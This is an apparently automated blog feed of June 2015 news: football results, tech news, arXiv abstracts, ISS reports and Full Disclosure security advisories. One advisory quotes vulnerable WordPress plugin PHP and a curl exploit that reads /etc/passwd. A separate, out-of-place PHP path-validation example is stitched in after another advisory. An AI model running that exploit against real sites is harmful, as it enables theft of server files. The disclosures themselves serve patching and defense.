Saturday, June 27, 2015

Paraguay again eliminates Brazil in Copa America quarters

CONCEPCION, Chile (AP) Paraguay beat Brazil 4-3 in a penalty shootout after a 1-1 draw Saturday night to advance to the semifinals of the Copa America, handing the five-time world champions yet another disappointment a year after the humiliating World Cup elimination at home.

from FOX Sports Digital http://ift.tt/1GI89vO
via IFTTT

Mexico rallies to tie Costa Rica 2-2 in Orlando

ORLANDO, Fla. (AP) Giovani Dos Santos and Javier Hernandez scored 2 minutes apart and Mexico overcame a shaky first half to tie Costa Rica 2-2 on Saturday in an exhibition game before the CONCACAF Gold Cup.

from FOX Sports Digital http://ift.tt/1CBzYnN
via IFTTT

Paraguay eliminates Brazil in Copa America quarterfinals

CONCEPCION, Chile (AP) Paraguay defeated Brazil 4-3 in a penalty shootout after a 1-1 draw on Saturday to advance to the semifinals of the Copa America.

from FOX Sports Digital http://ift.tt/1QWmsqR
via IFTTT

Anonymous: Si dedero

Anonymous: Si dedero. This digital print comes from The Si Placet Repertoire of 1480–1530 · Anonymous: Si dedero. Click for samples. Anonymous.

from Google Alert - anonymous http://ift.tt/1GT85LV
via IFTTT

I have a new follower on Twitter


Patrick Neeman
Digital Prophet. Interaction Designer. Whiskey Drinker. Runs http://t.co/NSfPstK2nU and http://t.co/6LJ2YCeO99.
Seattle, WA | Vancouver, BC
http://t.co/hm4pYtmjE3
Following: 19128 - Followers: 98303

June 27, 2015 at 04:06PM via Twitter http://twitter.com/usabilitycounts

Orioles: Saturday's game vs. Indians has been postponed (rain); split-admission DH on Sunday at 1:35 pm and 7:05 pm (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Classified Info Regarding Training Missions 9 - 11 (Contains Spoilers)

SECRET AGENTS ONLY: Classified Info Regarding Training Missions 9 - 11 (Contains Spoilers). By Anonymous on June 26, 2015 - 11:52. Greetings ...

from Google Alert - anonymous http://ift.tt/1LBSKnc
via IFTTT

Anonymous (@YourAnonCentral) | Twitter

The latest Tweets from Anonymous (@YourAnonCentral). We support the weak against the powerful. Casual propaganda. Information Jihad.

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/YourAnonCentral%3Flang%3Dta&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNGSaqLKlYNY137KwFcuIwOvocLsJQ
via IFTTT

Blatter: 'Liberating' to leave FIFA, expects 2016 election

GENEVA (AP) Sepp Blatter says his decision to leave FIFA was ''liberating'' and he expects the election to replace him will be in early 2016.

from FOX Sports Digital http://ift.tt/1LMO6Qd
via IFTTT

I have a new follower on Twitter


Charles Chaplin
Enjoy the best Charlie Chaplin Quotes..


Following: 213 - Followers: 33

June 27, 2015 at 06:39AM via Twitter http://twitter.com/CharliieChapln

Japan striker Okazaki joins Premier League club Leicester

LEICESTER, England (AP) Japan striker Shinji Okazaki has signed for English club Leicester and will become the seventh Japanese player to feature in the Premier League.

from FOX Sports Digital http://ift.tt/1TU44he
via IFTTT

World’s First 200Gb microSD Card Arrives

There isn't any troll in the title. The "World's Largest microSD" card, sized at 200GB, is now officially available for purchase from Amazon and a number of retailers. So, is your 16GB, 32GB, or even 64GB smartphone not enough to store all your data in one place? Order SanDisk's new high-capacity microSD card from Amazon now. However, the only issue is that it is not exactly very


from The Hacker News http://ift.tt/1HmyBRt
via IFTTT

Ghana FA to challenge report on World Cup money

ACCRA, Ghana (AP) The Ghana Football Association says it will challenge some of the findings of an inquiry which questioned how over $3.5 million meant for the team's preparations for last year's World Cup was used.

from FOX Sports Digital http://ift.tt/1fM7McV
via IFTTT

Europol Arrests Gang Behind Zeus And SpyEye Banking Malware

Law enforcement agencies from six European countries have taken down a major Ukraine-based cybercriminal gang suspected of developing, distributing and deploying the Zeus and SpyEye banking malware. According to the report on Europol's official website, authorities arrested five suspects between June 18 and 19. All five suspects are members of an alleged


from The Hacker News http://ift.tt/1CA9Ppr
via IFTTT

Exoplanet Disks In Formation

These visualizations were developed using a simulation run from the SMACK (Superparticle-Method Algorithm for Collisions in Kuiper belts) code.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1HmhE9u
via IFTTT

Planet Aurora


What bizarre alien planet is this? It's planet Earth of course, seen through the shimmering glow of aurorae from the International Space Station. About 400 kilometers (250 miles) above, the orbiting station is itself within the upper realm of the auroral displays, also watched from the planet's surface on June 23rd. Aurorae have the signature colors of excited molecules and atoms at the low densities found at extreme altitudes. The eerie greenish glow of molecular oxygen dominates this view. But higher, just above the space station's horizon, is a rarer red band of aurora from atomic oxygen. The ongoing geomagnetic storm began after a coronal mass ejection's recent impact on Earth's magnetosphere. via NASA http://ift.tt/1J9Ei2q

Friday, June 26, 2015

Orioles Highlight: Chris Davis singles in go-ahead run in 8th as Baltimore rallies vs. bullpen in 4-3 win over Indians (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Argentina tops Colombia 5-4 in shootout, reaches Copa semis

VINA DEL MAR, Chile (AP) Argentina defeated Colombia 5-4 on penalty kicks after a 0-0 tie Friday night and will play Brazil or Paraguay next week in the Copa America semifinals.

from FOX Sports Digital http://ift.tt/1CzA7Ih
via IFTTT

Argentina beats Colombia 5-4 on penalties to reach semis

VINA DEL MAR, Chile (AP) Argentina defeated Colombia 5-4 on penalties after a 0-0 draw on Friday to reach the semifinals of the Copa America.

from FOX Sports Digital http://ift.tt/1dmV9TY
via IFTTT

I have a new follower on Twitter


Raina Gray
Touch a scientist and you touch a child.
Spring Valley village, OH, USA

Following: 538 - Followers: 841

June 26, 2015 at 09:13PM via Twitter http://twitter.com/rainagray29

Orioles: SP Wei-Yin Chen recalled from Class A to start Friday against Indians; P TJ McFarland optioned to Triple-A (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

[FD] Response to Decision Group press release about security vulnerabilities in E-Detective Lawful Interception System

Two weeks ago I posted a security advisory[1] detailing severe security flaws in E-Detective, a "lawful" communications interception system. The vendor is a company called Decision Group and they claim on their website that their software is used by over 100 law enforcement agencies. A few days ago they posted a press release[2] to respond to an IBTimes article[3] that covered the security flaws. The mere fact that they responded to a news article about the security flaws instead of the original security advisory is telling of their attitude to security. An attitude that is unfortunately too common: that security is seen as an externality that affects its customers more than the company itself, so resources should only be devoted to it if it's a public relations issue. Nevertheless, their response is very much a non-response. It fails to express responsibility for the security holes, and instead deflects the responsibility onto their customers. Excusing their broken English, here's a point-by-point response to their press release.

>"Actually we are fully aware of such security concern since 4 years ago when our client asked to enhance the security level of E-Detective system."

The fact that they've been fully aware of these security flaws for 4 years and failed to do something about them until recently is not exactly redeeming. That only makes it much, much worse. By their own admission they admit that third parties (their clients) have known about these vulnerabilities. Their clients (one of whom they claim to be the National Security Bureau of the Republic of China, which is effectively the Chinese NSA) buy their software for the purpose of degrading security. One can only shudder to imagine how many times these flaws have been attempted to be exploited for the purpose of collecting intercepts from other customers.

>"The most important guideline of E-Detective deployment is that E-Detective should be deployed in the closed network domain without Internet access to outside world. This network domain should be also isolated from other corporate or government service network segment. By this way, only few authentic staff can access the internal system."

A great example of how a false sense of security can be dangerous. Isolating services in their own network doesn't fix the security flaws nor make them impossible to exploit - it just makes it harder. There are countless ways that a private network can be compromised, no matter how tight your network is. To get any reasonable work done staff members will move data in and out of the network, even if your network is disconnected from the Internet. There are many entry points into a network, something which shouldn't really need to be explained to a company that sells surveillance software for a living if they are competent. Software compartmentalisation and network isolation are good security practices, but they're not a substitute for fixing vulnerabilities or an excuse to run dangerously insecure software. Even if one were to make the (false) assumption that running E-Detective on an isolated network prevents vulnerabilities affected by it from being exploited: how many of those "100+" customers actually follow these guidelines or have a sane network setup that allows them to do this kind of isolation? Furthermore, the actual function of E-Detective means that it can never be on a fully isolated network. There will always be an entry point. E-Detective intercepts communications by using a man-in-the-middle proxy. That proxy will need to be connected to the network that the customer wants to intercept communications from. Based on the case studies that they list on their website, that network will also probably be connected to the Internet. Unless a human being is manually transferring data using external storage from the proxy to the E-Detective system, then the system will probably also be in some way connected to the proxy.

>"Since all users of E-Detective are of 4 types: operator, administrator, auditor and datamvr. Operator has the authorized right to input queries and view the scope of intercepted data by his/her own right. Administrator can have authorized right to conduct the operation of system backup, user management, and software system tuning…etc. Auditor has the only right to check and view all log files in the system. The last type of user is only for data transport between different systems, and it cannot be used for system access. None of these users has the superuser right of root. In most cases, root is basically set to hibernation status after system is activated by license under customer SLA request in order to terminate security backdoor."

All of this is made useless by a vulnerability that was discovered after the publication of the original security advisory. It turns out that features that the root user has access to are hidden from the menu of other users, but other users can still access those features by manually navigating to each feature's page. Even if the root user is deactivated after installation in "most cases", this still doesn't address the fact that the system backup feature uses a static key, which can be exploited to perform remote code execution.

>"Besides, E-Detective can be integrated with OTP server for more secured access control, and all logon access record will be reviewed in OTP server for auditing. Biometric access mechanism module with fingerprint can be also available by customer request, but it depends on whether the fingerprint reader is supported on user workstation."

The system is so dangerously insecure beyond easy repair at this point that I feel sorry for anyone that has to trust it with their biometric data.

>"After all, E-Detective system is used by our customer for network forensic purpose, such as internal data leakage protection, cyber evidence collection and lawful interception. System security is always the top priority for our customer. All the vulnerabilities mentioned in the news by International Business Times have been fixed several months ago. “Customer IT security is always our top concern,” said Casper Kan Chang, CEO of Decision Group, “and we have already fixed all the vulnerabilities in this current version of E-Detective for more than 11 months.” For those existing customers with old version of system still has concern, Decision Group will update it for free without hesitation."

If IT security is "always" their top concern, why did it take them 3 years to (claim to) fix these vulnerabilities? Have they proactively contacted the customers that are running insecure versions of their software, or are they waiting for their customers to contact them?

[1] http://ift.tt/1IURHyd
[2] http://ift.tt/1fKI4Wc
[3] http://ift.tt/1ImDy7g

Mustafa Al-Bassam
https://musalbas.com
https://twitter.com/musalbas

Source: Gmail -> IFTTT-> Blogger

[FD] Arbitrary File download in wordpress plugin wp-instance-rename v1.0

Title: Arbitrary File download in wordpress plugin wp-instance-rename v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-12
Download Site: http://ift.tt/1Jh6ovB
Vendor: Vlajo
Vendor Notified: 2015-06-12
Advisory: http://ift.tt/1Nh6dij
Vendor Contact:
Description: WordPress Rename plugin allows you to easily rename the complete WordPress installation. This plugin allows you to rename WordPress database, WordPress directory, change every necessary configuration file, easily from one page.
Vulnerability: The code in mysqldump_download.php doesn't check that the requested file is within the intended download directory:

    try {
        // all three values come straight from the query string, unvalidated
        $dbname = $_GET["dbname"];
        $dumpfname = $_GET["dumpfname"];
        $backup_folder = $_GET["backup_folder"];
    } catch (Exception $e) {}
    if (empty($backup_folder)) {
        $backup_folder = "backup/";
    }
    echo "$dumpfname";
    if (file_exists($dumpfname)) {
        // zip the dump file ($dumpfname may point to any readable file on disk)
        $name = $dbname . "_" . date("Y-m-d");
        $zipfname = $backup_folder . $name . ".zip";
        $zip = new ZipArchive();
        if ($zip->open($zipfname, ZIPARCHIVE::CREATE)) {
            $zip->addFile($dumpfname, $dumpfname);
            $zip->close();
        }
        // read zip file and send it to standard output
        if (file_exists($zipfname)) {
            header('Content-Description: File Transfer');
            header('Content-Type: application/octet-stream');
            header('Content-Disposition: attachment; filename=' . basename($zipfname));
            flush();
            readfile($zipfname);
        }
    }

CVEID: 2015-4703
OSVDB:
Exploit Code:
• curl --data "dbname=wp&dumpfname=/etc/passwd&backup_folder=." http://ift.tt/1fKI74C -o p.zip

Source: Gmail -> IFTTT-> Blogger

[FD] Remote file download vulnerability in download-zip-attachments v1.0

Title: Remote file download vulnerability in download-zip-attachments v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-10
Download Site: http://ift.tt/1Jh6ovx
Vendor: rivenvirus
Vendor Notified: 2015-06-15
Vendor Contact: http://ift.tt/1Nh6bHd
Advisory: http://ift.tt/1Jh6ovz
Description: Download all attachments from the post into a zip file.
Vulnerability: download-zip-attachments/download.php makes no checks to verify that the download path is within the specified upload directory.
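Both advisories above (mysqldump_download.php in wp-instance-rename and download.php in download-zip-attachments) describe the same defect: a client-supplied path is opened without checking that it stays inside the intended directory. The following is an added example, not code from either plugin or its author, of the check both handlers lack; the function names, the fixed backup directory and the WordPress capability check mentioned in the comments are assumptions.

```php
<?php
// Added example, not from either plugin: a server-side path check for a
// "download this backup" handler. Names and the fixed backup directory are
// assumptions; in WordPress the handler should additionally sit behind a
// capability check such as current_user_can('manage_options').

/**
 * Resolve $requested to a file inside $baseDir, or return null to refuse.
 * Rejects ../ traversal, absolute paths and symlinks that point out of the
 * directory, which covers the file reads the two advisories describe.
 */
function resolve_download_path(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    if ($base === false || !is_dir($base)) {
        return null;                       // backup directory is misconfigured
    }
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;                       // empty name or embedded NUL byte
    }
    // Keep only the file name: "../../etc/passwd" and "/etc/passwd" both
    // collapse to "passwd", which is then looked up inside $base only.
    $name = basename($requested);
    if ($name === '.' || $name === '..') {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($candidate === false || !is_file($candidate)) {
        return null;                       // missing, or not a regular file
    }
    // realpath() followed symlinks, so a link out of $base fails this prefix test.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;                       // resolved outside the backup directory
    }
    return $candidate;
}

/**
 * Hardened handler: the backup directory is fixed server-side (no
 * $_GET["backup_folder"]), and nothing is streamed unless the request
 * passed resolve_download_path().
 */
function serve_backup(string $backupDir, array $query): void
{
    $path = resolve_download_path($backupDir, (string)($query['dumpfname'] ?? ''));
    if ($path === null) {
        http_response_code(404);
        exit('No such backup');            // same answer for missing and refused
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    readfile($path);
    exit;
}

/**
 * Constructed check: a temporary backup directory holding one dump file.
 * Returns, for three request strings, whether the check accepted them.
 */
function demo(): array
{
    $dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'wp-backup-demo-' . getmypid();
    mkdir($dir, 0700);
    file_put_contents($dir . DIRECTORY_SEPARATOR . 'wp_2015-06-12.sql', "-- dump\n");
    $accepted = [
        'wp_2015-06-12.sql'   => resolve_download_path($dir, 'wp_2015-06-12.sql') !== null,
        '../../../etc/passwd' => resolve_download_path($dir, '../../../etc/passwd') !== null,
        '/etc/passwd'         => resolve_download_path($dir, '/etc/passwd') !== null,
    ];
    unlink($dir . DIRECTORY_SEPARATOR . 'wp_2015-06-12.sql');
    rmdir($dir);
    return $accepted;
}

var_dump(demo());
```

Run it from the command line with `php` to see which of the three constructed requests the check accepts; the traversal and absolute-path forms both fall back to a name that does not exist in the backup directory.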

Orioles: Minor league RHP Dennis Torres given 50-game suspension for 2nd violation of drug prevention program (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Boca president says Tevez is returning to Buenos Aires club

BUENOS AIRES, Argentina (AP) The president of Boca Juniors says Carlos Tevez is leaving Juventus to return to the Buenos Aires club.

from FOX Sports Digital http://ift.tt/1GCcAHt
via IFTTT

This Unbreakable Encryption Could Save the Internet

Awareness of the need to encrypt private data, chat conversations and other communications is booming like never before, so much so that the world may soon mark an International Encryption Day. Whether or not that happens, Toshiba is set to create a next level of encryption technology that the firm claims is absolutely unbreakable and "completely secure from tapping".


from The Hacker News http://ift.tt/1dlrFWH
via IFTTT

Martial signs new contract with Monaco

MONACO (AP) Up-and-coming striker Anthony Martial has extended his contract with Monaco until 2019.

from FOX Sports Digital http://ift.tt/1GO3KJU
via IFTTT

I have a new follower on Twitter


Joshua R. Williams
Healthcare IT Pro, Avid Investor, Former COO @PlayPwP, Wordsmith, News/Book Junkie... Detroit #Tigers fan, runner, biker, guitar shamer... My tweets are mine.
Michigan, USA
http://t.co/TzbsprnwnA
Following: 1851 - Followers: 1899

June 26, 2015 at 11:25AM via Twitter http://twitter.com/JRDubbleU

Cloud Source Repositories: Google Quietly Launches GitHub Competitor

After the death of Google Code this winter, Google is apparently back in the business through the launch of its private Git repository hosting service on Google Cloud Platform, called Cloud Source Repositories. It has not yet been officially announced, but Google started providing free beta access to its new Cloud Source Repositories earlier this year, VentureBeat reported. Similar to the


from The Hacker News http://ift.tt/1Nj98q7
via IFTTT

West Ham signs France midfielder Payet from Marseille

LONDON (AP) West Ham has signed France midfielder Dimitri Payet for a fee of more than 10 million pounds ($15.7 million) after Marseille reluctantly accepted an offer from the English club.

from FOX Sports Digital http://ift.tt/1NlJpOy
via IFTTT

ISS Daily Summary Report – 6/25/15

Ocular Health: Padalka executed his Medical Operations Flight Day 90 (FD90) Ocular Health activities with Kelly's assistance. Padalka performed Optical Coherence Tomography (OCT) and ocular ultrasound and later today will execute fundoscope measurements with Kelly as operator. OCT is used to measure retinal thickness, volume, and retinal nerve fiber layer, and fundoscopy is used to obtain images of the retinal surface. The Ocular Health protocol calls for a systematic gathering of physiological data to characterize the risk of microgravity-induced visual impairment/intracranial pressure in ISS crewmembers. Researchers believe that the measurement of visual, vascular and central nervous system changes over the course of this experiment and during the subsequent post-flight recovery will assist in the development of countermeasures, clinical monitoring strategies, and clinical practice guidelines.

Integrated Resistance and Aerobic Training Study (Sprint): Kelly, with Padalka assisting, configured video and the Ultrasound 2 machine, and donned the calf and thigh reference guides for his FD90 Sprint Ultrasound. Kelly then performed thigh and calf scans with guidance from the Sprint ground team. Sprint evaluates the use of high intensity, low volume exercise training to minimize loss of muscle, bone, and cardiovascular function in ISS crewmembers during long-duration missions. Ultrasound scans are used to evaluate spaceflight-induced changes in muscle volume.

Fine Motor Skills: Kelly and Kornienko executed their FD90 Fine Motor Skills experiment this morning, between one and four hours after wakeup. In the Fine Motor Skills experiment, crew members perform a series of interactive tasks on a touchscreen tablet. The investigation is the first fine motor skills study to measure long-term microgravity exposure, different phases of microgravity adaptation, and sensorimotor recovery after returning to Earth gravity. The goal of Fine Motor Skills is to answer how fine motor performance in microgravity trends/varies over the duration of a six-month and a year-long space mission; how fine motor performance on orbit compares with that of a closely matched participant on Earth; and how performance trends/varies before and after gravitational transitions, including the periods of early flight adaptation and the very early/near immediate post-flight periods.

SpaceX (SpX)-7 Preparations: Kelly and Padalka completed another session of On Board Training (OBT) with the robotics trainer to prepare for capture/berthing of the Dragon vehicle. Today they practiced a 30 meter approach and two capture point hold runs. SpX-7 launch is planned for Sunday, June 28 with berthing on Tuesday, June 30.

Ground Camera Calibration: Ground controllers performed a calibration of ISS external cameras today, in preparation for SpaceX-7 arrival. The purpose of the calibration is to make sure that the overlays displayed by the Robotics Workstation line up properly with the video images during SpaceX-7 approach and capture. Today's activity gathered data on the camera pan and tilt calibration. Using this data, ground teams determined that the camera calibrations are within limits and no adjustments are needed.

Today's Planned Activities
All activities were completed unless otherwise noted.
- SLEEP questionnaire
- SPLANKH. Experiment ops.
- SLEEP questionnaire
- ОСТ – hardware prep
- ОСТ – eye scan
- ОСТ – hardware stow
- USND2 – activation
- Fine Motor Skills – experiment
- FINEMOTR – experiment ops
- Eye ultrasound – hardware prep
- Eye ultrasound
- СОЖ Maintenance
- Eye ultrasound – data transfer
- Preparing LAB Camcorder in LAB RWS Mon 1 for Earth observation
- ОTKLIK. Instrumentation monitoring
- Eye ultrasound – closeout ops
- SPRINT – hardware setup
- SPRINT – experiment ops assist
- SPLANKH. Repeat bio-chemical blood analysis.
- SPLANKH. Closeout ops.
- USND2 – deactivation
- Dragon rendezvous and berthing OBT procedures self-study
- URAGAN. Observation and photography using [НА ВСС] science instrumentation
- SPLANKH. Experiment ops
- PROBOI. [АР] teardown and connecting cables
- RGN – water transfer to EDV (start)
- Fundoscopic eye exam – hardware prep
- IMS update
- Fundoscopic eye exam – pupil dilation
- SYN_MUSCL – photo registry
- RGN – water transfer to EDV (end)
- Fundoscopic eye exam
- CONTENT. Experiment ops
- Crew conference with Astronaut Office
- Flight Director conference
- Fundoscopic eye exam – hardware stow

Completed Task List Items
None

Ground Activities
All activities were completed unless otherwise noted.
- SPRINT
- Ocular Health
- Dragon OBT
- Camera Calibration

Three-Day Look Ahead:
Friday, 06/26: Crew off duty
Saturday, 06/27: Housekeeping, Crew off duty
Sunday, 06/28: Crew off duty, SpX-7 launch

QUICK ISS Status – Environmental Control Group:

Component                                         Status
Elektron                                          On
Vozdukh                                           Manual
[СКВ] 1 – SM Air Conditioner System ("SKV1")      Off
[СКВ] 2 – SM Air Conditioner System ("SKV2")      On
Carbon Dioxide Removal Assembly (CDRA) Lab        Standby
Carbon Dioxide Removal Assembly (CDRA) Node 3     Operate
Major Constituent Analyzer (MCA) Lab              Shutdown
Major Constituent Analyzer (MCA) Node 3           Operate
Oxygen Generation Assembly (OGA)                  Standby
Urine Processing Assembly (UPA)                   Standby
Trace Contaminant Control System (TCCS) Lab       Off
Trace Contaminant Control System (TCCS) Node 3    Full Up

from ISS On-Orbit Status Report http://ift.tt/1BGW2Cs
via IFTTT

Swiss court denies bail release for detainee in FIFA case

BELLINZONA, Switzerland (AP) Switzerland's Federal Criminal Court has rejected a request for release on bail by one of the seven men arrested on corruption charges last month in a raid on FIFA's luxury hotel in Zurich.

from FOX Sports Digital http://ift.tt/1RCrxzD
via IFTTT

FIFA: Blatter not making U-turn on pledge to leave office

ZURICH (AP) FIFA President Sepp Blatter has not made a U-turn on his plans to leave office, the governing body said Friday.

from FOX Sports Digital http://ift.tt/1eLHTdb
via IFTTT

[FD] SEC Consult SA-20150626-0 :: Critical vulnerabilities in Polycom RealPresence Resource Manager (RPRM) allow surveillance on conferences


Source: Gmail -> IFTTT-> Blogger

Mainz open to offers for Jara after incident with Cavani

BERLIN (AP) Mainz will listen to offers for Gonzalo Jara following the Chile defender's provocation of Uruguay's Edinson Cavani in the Copa America quarterfinals.

from FOX Sports Digital http://ift.tt/1NlwFr3
via IFTTT

Rival factions choose 2 venues for Pakistan soccer elections

ISLAMABAD (AP) The battle for power in Pakistan soccer is expected to get more complicated as voters could split at two different venues next Tuesday to elect a president of the Pakistan Football Federation.

from FOX Sports Digital http://ift.tt/1eLzEOb
via IFTTT

Facebook Can Recognize You Even if You Don't Show Your Face

Well, this is incredible and scary at the same time. Forget about "facial" recognition; Facebook's newest technology is so good at identifying you in photos that it does not even need to see your face. The New Scientist is reporting on Facebook's new "experimental" facial recognition algorithm, which is so powerful that it can identify you in photos even when your face is hidden.


from The Hacker News http://ift.tt/1TR7dym
via IFTTT

You Can Now Use Messenger App without a Facebook Account

Don't have a Facebook account but want to use its Messenger service? Then go for it, because Mark Zuckerberg wants even the people who hate Facebook to use the social network's separate Messenger service. So, you no longer need an active Facebook account to make use of the Messenger service; all you need is your name and phone number, the company announced today.


from The Hacker News http://ift.tt/1KgEcsV
via IFTTT

France May Offer Asylum to Edward Snowden and Julian Assange

In the wake of the latest revelations about the National Security Agency (NSA) spying globally on countries' leaders, France may decide to offer political asylum to whistleblowers Edward Snowden and Julian Assange as a "symbolic gesture." Former NSA contractor Edward Snowden, who is facing criminal espionage charges in the U.S., has remained in Russia for almost two years after exposing the


from The Hacker News http://ift.tt/1BQU7eV
via IFTTT

Star Trails Above Table Mountain


Stars trail above and urban lights sprawl below in this moonlit nightscape from Cape Town, South Africa, planet Earth. The looming form of Table Mountain almost seems to hold terrestrial lights at bay while the stars circle the planet's South Celestial Pole. This modern perspective on the natural night sky was captured in June 2014, the scene composed of over nine hundred, stacked 30 second exposures. The stunning result was chosen as the winner in the Against the Lights category, a selection from over 800 entries in The World at Night's 2015 International Earth and Sky Photo Contest. via NASA http://ift.tt/1e5iHNQ

Thursday, June 25, 2015

Guerrero scores 3 and Peru beats Bolivia 3-1 to reach semis

TEMUCO, Peru (AP) A Paulo Guerrero hat trick led Peru to a 3-1 win against Bolivia on Thursday, securing a place in the semifinals of the Copa America.

from FOX Sports Digital http://ift.tt/1KexT7w
via IFTTT

Cascade hash tables: a series of multilevel double hashing schemes with O(1) worst case lookup time. (arXiv:cs/0608037v3 [cs.DS] UPDATED)

In this paper, the author proposes a series of multilevel double hashing schemes called cascade hash tables. They use several levels of hash tables. In each table, the common double hashing scheme is used. Higher level hash tables work as fail-safes for lower level hash tables. This strategy effectively reduces collisions on hash insertion, so the scheme achieves a constant worst case lookup time with a relatively high load factor (70%-85%) in random experiments. Different parameters of cascade hash tables are tested.



from cs.AI updates on arXiv.org http://ift.tt/1LHMmIa
via IFTTT

Spectral Ranking using Seriation. (arXiv:1406.5370v2 [cs.LG] UPDATED)

We describe a seriation algorithm for ranking a set of items given pairwise comparisons between these items. Intuitively, the algorithm assigns similar rankings to items that compare similarly with all others. It does so by constructing a similarity matrix from pairwise comparisons, using seriation methods to reorder this matrix and construct a ranking. We first show that this spectral seriation algorithm recovers the true ranking when all pairwise comparisons are observed and consistent with a total order. We then show that ranking reconstruction is still exact when some pairwise comparisons are corrupted or missing, and that seriation based spectral ranking is more robust to noise than classical scoring methods. Finally, we bound the ranking error when only a random subset of the comparisons are observed. An additional benefit of the seriation formulation is that it allows us to solve semi-supervised ranking problems. Experiments on both synthetic and real datasets demonstrate that seriation based spectral ranking achieves competitive and in some cases superior performance compared to classical ranking methods.



from cs.AI updates on arXiv.org http://ift.tt/1p7LaGZ
via IFTTT

A Theory of Formal Synthesis via Inductive Learning. (arXiv:1505.03953v2 [cs.AI] UPDATED)

Formal synthesis is the process of generating a program satisfying a high-level specification. In recent times, effective formal synthesis methods have been proposed based on the use of inductive learning. We refer to this class of methods that learn programs from examples as formal inductive synthesis. In this paper, we present a theoretical framework for formal inductive synthesis. We discuss how formal inductive synthesis differs from traditional machine learning. We then describe oracle-guided inductive synthesis (OGIS), a class of synthesizers that operate by iteratively querying an oracle. An instance of OGIS that has had much practical impact is counterexample-guided inductive synthesis (CEGIS). We present a theoretical characterization of CEGIS for learning any program that computes a recursive language. In particular, we analyze the relative power of CEGIS variants where the types of counterexamples generated by the oracle varies. We also consider the impact of bounded versus unbounded memory available to the learning algorithm. In the special case where the universe of candidate programs is finite, we relate the speed of convergence to the notion of teaching dimension studied in machine learning theory. Altogether, the results of the paper take a first step towards a theoretical foundation for the emerging field of formal inductive synthesis.



from cs.AI updates on arXiv.org http://ift.tt/1EUN3JL
via IFTTT

Orioles Highlight: Steve Pearce makes great catch, Matt Wieters 2-run HR in 8-6 victory over Red Sox (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Paraguay revokes immunity for soccer headquarters

ASUNCION, Paraguay (AP) Paraguay's president has signed a law repealing the immunity that the headquarters of South America's soccer confederation enjoyed for nearly two decades.

from FOX Sports Digital http://ift.tt/1Guc1R5
via IFTTT

[FD] SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS

SBA Research Vulnerability Disclosure

title: Koha Unauthenticated SQL injection
product: Koha ILS
affected version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
fixed version: 3.20.1, 3.17.8, 3.16.12
CVE numbers: CVE-2015-4633, CVE-2015-4632, CVE-2015-4631
impact: critical
website: http://ift.tt/1Jm1WM2
found by: Raschin Tavakoli / SBA Research Combinatorial Security Testing Group
contact: cst@sba-research.org
References:
http://ift.tt/1FDcmzb
http://ift.tt/1Jm1WM3
http://ift.tt/1FDcmzd
http://ift.tt/1Jm1VI0
http://ift.tt/1FDcmPL
http://ift.tt/1Jm1VI2
http://ift.tt/1FDcmPN
http://ift.tt/1Jm1WM9
http://ift.tt/1FDcn61

1. Multiple SQL Injections

a) Unauthenticated SQL Injection in OPAC interface (CVE-2015-4633)

Vulnerability:

Source: Gmail -> IFTTT-> Blogger

Orioles: RHP Miguel Gonzalez has been reinstated from 15-day DL; RHP Mychal Givens optioned to Double-A (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Adobe Releases Emergency Patch for Flash Zero-Day Vulnerability

Adobe has rolled out an emergency software patch for its Flash Player to fix a critical zero-day vulnerability that is already being exploited in the wild. The company said the flaw could allow attackers to take control of the affected system and that it had evidence of "limited, targeted attacks" exploiting the flaw. Therefore, Adobe is urging users and


from The Hacker News http://ift.tt/1LFYn0P
via IFTTT

[FD] Recommendation: Flaw in K9 Web Protection 4.4.268

A flaw exists in K9 Web Protection version 4.4.268 that allows any user to bypass the K9 Web Protection filter by using proxies. Proxies are well known to bypass ISP filters as well as any parental block application such as K9 Web Protection. For this test we ran 638 listed proxies and 25 could bypass the "Proxy Avoidance" category because they were incorrectly categorized.

Source: Gmail -> IFTTT-> Blogger

Jara could face suspension for provoking Cavani

SANTIAGO, Chile (AP) South American football officials will look into the actions of Chile defender Gonzalo Jara, who was caught by TV cameras poking Edinson Cavani's behind to provoke a red card in the quarterfinals of the Copa America.

from FOX Sports Digital http://ift.tt/1BDKjEI
via IFTTT

News: Icarus: The Pluto System on the Eve of New Horizons

We are offering Promotional Access* to the Special Issue for July to coincide with the closest approach of New Horizons to Pluto
The Pluto System on the Eve of New Horizons Volume 246, Pages 1-374 (15 January 2015)
Guest editors: Fran Bagenal, Bonnie Buratti, Randy Gladstone, Will Grundy and Alan Stern.



from Icarus http://ift.tt/1KcGx6s
via IFTTT

Set Anonymous User Commenting by Default?

Hello, I was wondering if there is a way that I can make user comments show up as anonymous by default, using either a module, or some drupal ...

from Google Alert - anonymous http://ift.tt/1GtveCv
via IFTTT

New Pics Added to the Blog Gallery! (June 25, 2015)

BRCartoon2forBlog
New Pics Added to the Blog Gallery! (June 25, 2015)

Click link below to visit gallery now!
http://ift.tt/1HAGoHC




from The 'hotspot' for all things Bob Ross. http://ift.tt/1LEYyJN
via IFTTT

ISS Daily Summary Report – 06/24/15

